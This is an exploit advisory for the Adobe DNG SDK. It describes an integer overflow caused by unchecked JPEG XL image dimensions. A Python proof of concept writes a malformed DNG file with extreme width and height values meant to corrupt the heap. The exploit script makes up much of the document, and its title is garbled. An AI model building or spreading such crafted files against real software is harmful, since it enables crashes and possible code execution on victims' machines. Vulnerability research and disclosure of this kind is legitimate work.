=============================================================================================================================================
| # Title     : Adobe DNG SDK v 1.7.1 2410 Files Containing JPEG XL Streams Due to Improper Dimension Validation Integer Overflow           |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://helpx.adobe.com/camera-raw/digital-negative.html                                                                    |
=============================================================================================================================================

[+] Summary    :  A potential security issue may arise when processing DNG (Digital Negative) files that embed JPEG XL (JXL) compressed image streams if image dimensions are not properly validated before memory allocation.
                  In this scenario, specially crafted width and height values are embedded inside the JPEG XL stream and referenced within the DNG/TIFF structure. If a vulnerable decoder performs unchecked arithmetic operations (e.g., width × height) using 32-bit integers or without overflow protection, this may lead to:

Integer overflow

Incorrect memory allocation size

Heap corruption

Out-of-bounds memory writes

Application crash or potential code execution

The issue typically occurs when:

The parser trusts image metadata values.

Multiplication is performed without verifying against SIZE_MAX.

The allocated buffer size is smaller than the required pixel storage.

This type of vulnerability is common in image parsing libraries when handling untrusted media files and highlights the importance of strict bounds checking and safe arithmetic operations during image decoding.
				  
[+] POC   :  

import struct

def create_malicious_jxl_stream():
    """
    Builds a minimal JXL header containing dimensions that cause an Overflow.
    Target dimensions: 1431655766 (Width) and 715827883 (Height).
    """
    signature = b'\xff\x0a' 
    width = struct.pack("<I", 1431655766)
    height = struct.pack("<I", 715827883)
    extra_data = b'\x00' * 100    
    return signature + width + height + extra_data

def generate_dng_exploit(filename="exploit_poc.dng"):
    print(f"[*] Creating malicious DNG file: {filename}")
    header = struct.pack("<HH", 0x4949, 42)
    ifd_offset = struct.pack("<I", 8)    
    ifd_entries_count = struct.pack("<H", 3)
    tag_compression = struct.pack("<HHII", 259, 3, 1, 50007)
    tag_width = struct.pack("<HHII", 256, 4, 1, 1431655766)
    

    data_offset = 8 + 2 + (12 * 3) + 4 
    tag_strip_offsets = struct.pack("<HHII", 273, 4, 1, data_offset)
    
    next_ifd = struct.pack("<I", 0) 
    
    jxl_data = create_malicious_jxl_stream()
    
    with open(filename, "wb") as f:
        f.write(header)
        f.write(ifd_offset)
        f.write(ifd_entries_count)
        f.write(tag_compression)
        f.write(tag_width)
        f.write(tag_strip_offsets)
        f.write(next_ifd)
        f.write(jxl_data)

    print(f"[+] Success! File saved. Use 'dng_validate {filename}' to test.")

if __name__ == "__main__":
    generate_dng_exploit()
	
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================